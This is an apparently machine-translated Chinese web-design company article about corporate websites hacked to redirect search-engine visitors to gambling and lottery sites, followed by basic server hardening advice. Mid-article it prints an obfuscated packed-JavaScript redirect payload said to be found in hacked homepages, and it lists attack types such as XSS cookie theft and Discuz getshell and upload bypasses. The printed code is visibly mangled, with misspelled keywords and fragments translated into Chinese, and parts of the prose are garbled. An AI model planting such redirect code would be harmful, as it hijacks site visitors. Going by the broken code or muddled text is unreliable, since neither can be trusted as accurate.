如何應(yīng)對(duì)企業(yè)網(wǎng)站惡意跳轉(zhuǎn)到賭博網(wǎng)站

2021-04-20    分類: 網(wǎng)站建設(shè)

近日,公司內(nèi)部一位紀(jì)錄片同事表示,當(dāng)大量廣州建站公司客戶在做百度推廣時(shí),網(wǎng)站首頁(yè)點(diǎn)擊后會(huì)自動(dòng)跳轉(zhuǎn)到彩票網(wǎng)站和賭博網(wǎng)站,讓用戶從百度搜索或推廣廣告空間進(jìn)入網(wǎng)站后可以跳轉(zhuǎn),但直接進(jìn)入網(wǎng)站時(shí)沒有跳轉(zhuǎn)。由此造成的用戶流失導(dǎo)致訪問量銳減、網(wǎng)站服務(wù)器資源浪費(fèi)、推廣費(fèi)用浪費(fèi)等。甚至可以說,在百度推廣和搜狗推廣的都是廣告彩票公司,在網(wǎng)站建設(shè)行業(yè)引起軒然大波。


很多客戶在回應(yīng)這個(gè)問題的時(shí)候,會(huì)找廣告主來補(bǔ)償甚至追究責(zé)任。因此,我們的運(yùn)營(yíng)商需要關(guān)注并知道如何快速解決網(wǎng)站惡意跳轉(zhuǎn)的問題。經(jīng)過網(wǎng)絡(luò)咨詢和測(cè)試,廣州網(wǎng)站建設(shè)公司于君網(wǎng)總結(jié)了以下經(jīng)驗(yàn):


首先分析網(wǎng)站被黑,跳轉(zhuǎn)到賭博網(wǎng)站的原因


一般一個(gè)網(wǎng)站被黑,是因?yàn)榉?wù)器信息(服務(wù)器IP遠(yuǎn)程端口管理員賬號(hào)密碼、SSH端口、root賬號(hào)密碼)與包括FTP賬號(hào)密碼在內(nèi)的網(wǎng)站信息對(duì)接被黑客知道,導(dǎo)致黑客植入木馬或后門。


在整體安全監(jiān)控中,asp網(wǎng)站和php網(wǎng)站都有木馬,這意味著木馬可以以php腳本木馬、asp腳本木馬和jsp腳本木馬的形式存在。這些木馬可以惡意篡改網(wǎng)站、上傳、重命名、下載等管理員的高權(quán)限操作。網(wǎng)站被跳轉(zhuǎn)的客戶所采用的網(wǎng)站架構(gòu)是php  mysql架構(gòu)和jsp  mysql架構(gòu),大多使用開源程序,如dedecms、dream  weaving系統(tǒng)、phpcms系統(tǒng)、discuz系統(tǒng)等。


當(dāng)我們知道一些代碼的時(shí)候,難免會(huì)在網(wǎng)站首頁(yè)看到一些惡意篡改代碼。刪除惡意代碼后,我們可能會(huì)在幾天內(nèi)完全停止跳轉(zhuǎn),但一段時(shí)間后,我們又會(huì)被跳轉(zhuǎn)。這是一個(gè)非常討厭的臨時(shí)解決方案。短時(shí)間后網(wǎng)站會(huì)再次跳轉(zhuǎn),很難甚至不可能完全消除網(wǎng)站漏洞。


通過觀察一些客戶網(wǎng)站的首頁(yè),首頁(yè)代碼中有一個(gè)加密的代碼,根據(jù)搜索引擎的特點(diǎn)進(jìn)行跳轉(zhuǎn)。例如,通過百度搜索和360搜索,搜狗搜索人會(huì)直接跳到彩票和賭博網(wǎng)站。以下代碼:


type='text/java  '


eval(function(p,a,c,k,e,d){e=function(c){return(c35?string  . FromCharCode(c  29): c  . ToString(36))};if(!''.replace(/^/,string)){while(c-)d[e(c)]=k[c]| | e(c);k=[function(e){ retun  d[e]}];e=function(){ return  ' \ w  ' };c=1;};while(c-)if(k[c])p=p  . replace(new  RegExp(' b  ' e(c)' \ b  ',' g  '),k[c]);返回p;}(' l[' \ e  \ c  \ 1 \ m  \ I  \ 8 \ n  \ 0 '][' \ 7 \ 4 \ 9 \ 0 \ 8 '](' h  \ 2 \ 1 \ 4 \ 9 \ 3 \ 0 \ j  \ 3 \ 8 \ d  \ 6 \ 0 \ 8 \ k  \ 0 \ 5 \ f  \ a  \ r  \ a  2 \ 1 \ 4 \ 9 \ 3 \ 0 \ 6 \ 2 \ 4 \ 1 \ d  \ 6 \ s  \ 0 \ 3 \ 2 \ q  \ 5 \ 5 \ 7,29,29,' x74 | x63 | x73 | X70 | x72 | x2f  | x22 | x77 | x65 | x69 | x61 | x2e  | x6f  | X3D  | x64 | x6a  | x3e  | x3c  | x6d  | x79 | x78 | window  | x75 | x6e  | x6c  | x38 | x3a  | x76 | x68 '。拆分(' | '),0,{}))一旦受到攻擊,百度搜索引擎會(huì)判斷該網(wǎng)站是否受到攻擊,然后在百度風(fēng)險(xiǎn)評(píng)估中心記錄并標(biāo)記該網(wǎng)站。百度網(wǎng)站安全中心提醒您,網(wǎng)站可能遭到黑客攻擊,部分頁(yè)面被非法篡改!紅色表示百度風(fēng)險(xiǎn)。導(dǎo)致客戶打開網(wǎng)站被百度直接攔截,如下圖所示:



針對(duì)以上跳轉(zhuǎn)攻擊的特點(diǎn),我司廣州網(wǎng)站建設(shè)公司同意從手工代碼方面進(jìn)行審計(jì),檢測(cè)網(wǎng)站漏洞,網(wǎng)站后門木馬清理,漏洞修復(fù),xss獲取管理員賬號(hào)cookies,discuz擁有g(shù)etshell漏洞,inject獲取管理員漏洞,discuz上傳繞過漏洞等。


二、修復(fù)并防止網(wǎng)站被惡意跳轉(zhuǎn)


1.服務(wù)器目錄的安全部署、管理員帳戶密碼的加密、數(shù)字的特殊符號(hào)要求、所有密碼的大寫字母和小寫字母,以及向網(wǎng)站數(shù)據(jù)庫(kù)分配公共權(quán)限帳戶。


2.mysql數(shù)據(jù)庫(kù)默認(rèn)端口由3306改為61116,添加到端口安全策略中。不對(duì)外開放,外部IP無(wú)法連接數(shù)據(jù)庫(kù)。只有本地127.0.0.1才能連接到數(shù)據(jù)庫(kù),以防止攻擊者惡意猜測(cè)。


3.保護(hù)服務(wù)器的底層系統(tǒng),包括遠(yuǎn)程端口登錄的安全驗(yàn)證。


4.對(duì)網(wǎng)站代碼進(jìn)行全面的安全檢查,包括定期升級(jí)網(wǎng)站程序源代碼,修復(fù)補(bǔ)丁和網(wǎng)站漏洞。


廣州網(wǎng)站建設(shè)公司處理網(wǎng)站跳轉(zhuǎn)問題的方法有很多,以上只是解決問題的方法之一,所以作為網(wǎng)站建設(shè)公司,要對(duì)源代碼進(jìn)行優(yōu)化調(diào)整,以保證后期網(wǎng)站不受影響,這就涉及到了源代碼和網(wǎng)站版本的升級(jí)。


網(wǎng)站欄目:如何應(yīng)對(duì)企業(yè)網(wǎng)站惡意跳轉(zhuǎn)到賭博網(wǎng)站
文章起源:http://www.muchs.cn/news3/108953.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供網(wǎng)站設(shè)計(jì)公司網(wǎng)站設(shè)計(jì)建站公司、網(wǎng)站收錄、ChatGPT、服務(wù)器托管

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如需處理請(qǐng)聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來源: 創(chuàng)新互聯(lián)

成都定制網(wǎng)站建設(shè)